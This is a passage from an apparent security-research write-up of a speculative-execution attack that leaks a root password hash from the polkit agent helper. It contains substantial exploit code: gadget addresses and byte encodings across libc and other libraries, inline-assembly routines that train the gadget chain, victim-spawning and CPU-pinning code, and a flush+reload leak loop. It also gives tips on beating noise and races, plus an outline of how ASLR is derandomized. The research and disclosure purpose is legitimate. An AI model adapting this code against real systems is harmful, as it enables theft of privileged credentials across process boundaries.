0x7ffff73af74b: mov al, byte [rcx+rax] ; ret    ; (/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4)

The first gadget reads a byte of the secret using the attacker-controlled rax as an index, with zero-extension so that the rest of rax is cleared. The secret byte then gets rotated left by 8, shifted left by another 2, and finally used as an index into a memory load relative to rcx.
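In C terms, the chain computes the following (my own restatement): the leaked byte selects one of 256 cache lines at a 1 KiB stride above rcx, which points into glibc's shared .text -- in effect a flush+reload buffer that the attacker can probe from its own mapping of the same library.

#include <stdint.h>

static inline uint64_t chain_offset(uint8_t secret)
{
    uint64_t rax = secret;       /* movzx eax, byte [rax+rdx]: byte in bits 7:0 */
    rax = (uint32_t)(rax << 8);  /* rol eax, 8: with the upper bits clear,
                                    the rotate is just a shift */
    rax <<= 2;                   /* shl rax, 2: offset = secret * 1024 */
    return rax;                  /* mov al, [rcx+rax] touches that line */
}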

Exploit!

The procedure works as follows. The attacker forks a new process, pins it and itself to the same hardware thread, and spawns the victim program; sharing a hardware thread lets the attacker and victim share branch prediction and cache state. The attacker attaches a socket to the victim's stdin and waits for the password prompt. To train the gadget chain in the victim, we then construct, at aliasing addresses, a copy of the ROP-gadget chain made up of NOPs and RETs, and execute it.
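The setup plumbing, condensed (pin_to_cpu and spawn_victim are my own helper names, not the exploit's actual interfaces):

#define _GNU_SOURCE
#include <sched.h>
#include <sys/socket.h>
#include <unistd.h>
#include <err.h>

static void pin_to_cpu(int cpu)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    if (sched_setaffinity(0, sizeof(set), &set))
        err(1, "sched_setaffinity");
}

/* Returns the fd the attacker writes password bytes into. */
static int spawn_victim(int cpu)
{
    int sv[2];
    /* A socketpair, *not* a pipe: reading from a socket is complicated
     * enough to underflow the RSB in the victim's read() path. */
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv))
        err(1, "socketpair");
    if (fork() == 0) {
        pin_to_cpu(cpu);
        dup2(sv[0], 0); /* stdin: a socket is "anything but a tty" */
        execl("/usr/libexec/polkit-agent-helper-1",
              "polkit-agent-helper-1", "root", "cookie", (char *)NULL);
        err(1, "execl");
    }
    pin_to_cpu(cpu);
    return sv[1];
}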


#define LIBC_AX         0x7ffff7be0000
#define LIBICUUC_AX     0x7ffff68eb000
#define LIBZSTD_AX      0x7ffff75ee000
#define LIBPCRE2_8_AX   0x7ffff73ad000

#define GADGET(start, size)       \
    {                             \
        start, start + (size - 1) \
    }

static struct bhb_bb bhb_path_b[] = {
    // __GI__IO_default_uflow
    GADGET(LIBC_AX     + 0x065d96, 27), //
    // movzbl (%rax,%rdx,1),%eax ; ret \x0F\xB6\x04\x10\xC3
    GADGET(LIBICUUC_AX + 0x005a69, 5),
    //  rol $8, %eax; ret \xC1\xC0\x08\xc3
    GADGET(LIBC_AX     + 0x10e5b7, 4),
    // shl $2, %rax ; ret \x48\xC1\xE0\x02\xc3
    GADGET(LIBZSTD_AX  + 0x45ec, 5),
    // mov (%rcx,%rax,1), %al ; ret \x8A\x04\x01\xC3
    GADGET(LIBPCRE2_8_AX + 0x74b, 4)
};

#define BHB_B_LEN (sizeof(bhb_path_b) / sizeof(*bhb_path_b))
void init_gadgetchain(long off)
{
    for (int i = 0; i < BHB_B_LEN; ++i) {
        struct bhb_bb *bb = &bhb_path_b[i];
        memset(_ptr(F(bb->start_adr - off)), 0x90, bb_len(bb));
        memcpy(_ptr(F(bb->end_adr - off)), "\xc3", 1);
    }
}

void train_gadgetchain(u64 off)
{
    static long bbstack[6];
    for (int i = 0; i < BHB_B_LEN; ++i) {
        bbstack[i] = F(bhb_path_b[i].start_adr - off);
    }
    void finland();
    bbstack[BHB_B_LEN] = (long)finland;
    bbstack[0] = F(bhb_path_b[0].start_adr - off);
    asm("mov    %%rsp, %%r15  \n"
        "lea    8(%0), %%rsp  \n"
        "jmp    *(%0)         \n"
        "finland:             \n" /* come back here */
        "mov    %%r15, %%rsp  \n" ::"r"(bbstack)
        : "r15", "rax", "memory");
}

To trigger the victim, we send it a byte whose value is the byte offset of the secret that we want to leak.

static struct timespec req = {0,0};

int runsu_poke(child_proc_t *child, char c) {
    int ret = write(child->input, &c, 1);
    clock_nanosleep(CLOCK_REALTIME, 0, &req, NULL);
    return ret;
}

The condensed procedure becomes something similar to:

static const u64 rb_start = (u64)read + 18; /* rcx in victim points to read<+18> */
for (int sec_idx = 1; sec_idx < 110; ++sec_idx) {
    int guess = -1;
    while (guess == -1) {
        train_gadgetchain(off);
        flush_range(rb_start, RB_STRIDE, RB_SLOTS);
        runsu_poke(runsu, sec_idx-1);
        reload_range(rb_start, RB_STRIDE, RB_SLOTS, results);
        for (int i = 1; i < RB_SLOTS; ++i) {
            if (results[i] > 1) {
                guess = i;
                break;
            }
        }
    }
    secret[sec_idx] = guess;
}

Does this work? Not at all! First of all, we have to win a race condition: we need enough time to execute the entire gadget chain before the real return target comes back from the program stack. I was stuck at this point for an awfully long time. I attempted evicting the program stack from a sibling thread, but it didn't work. I attempted to prefetch the code of the respective gadgets by targeting preceding returns, which also did not work. Because the shl gadget is not strictly necessary, I removed it.

Because the results were extremely noisy, rather than flushing and reloading an entire range, I tried to flush and reload only a single entry, matching the 'o' of 'root' in the password hash. If any of the tweaking worked, it should detect this byte.

To slow down the victim, I introduced random memory noise by simply running the old stress-test tool, stress -m 1, alongside. This way, I would occasionally see what appeared to be signal from the 'o'. However, the results were still noisy. It appeared that certain instances of the victim process were noisier than others, and those instances wouldn't be able to leak anything. So I tested each victim instance for whether it could leak the 'o' before using it. This way, I was able to leak information -- albeit at an incredibly low speed! But that is a different problem; we only wanted to show that the attack works!

Behold: https://www.youtube.com/watch?v=VYEVcj-vnbs

What about ASLR?

I skipped this for brevity. However, we do derandomize ASLR, and incredibly efficiently too! We derandomize the lower 32 bits of the address space, which is sufficient: we only need the lower 24 bits to hijack a particular branch, and only the lower 32 bits are recorded in the BTB prediction anyway. To derandomize, we use a "reversed" branch target injection attack, in the sense that we let the victim train a branch in the attacker's process. The attacker then guesses around until it finds a branch that gets predicted with a prediction from the victim, thereby learning about the victim's address space layout. For details on the ASLR exploit, I refer you to the paper.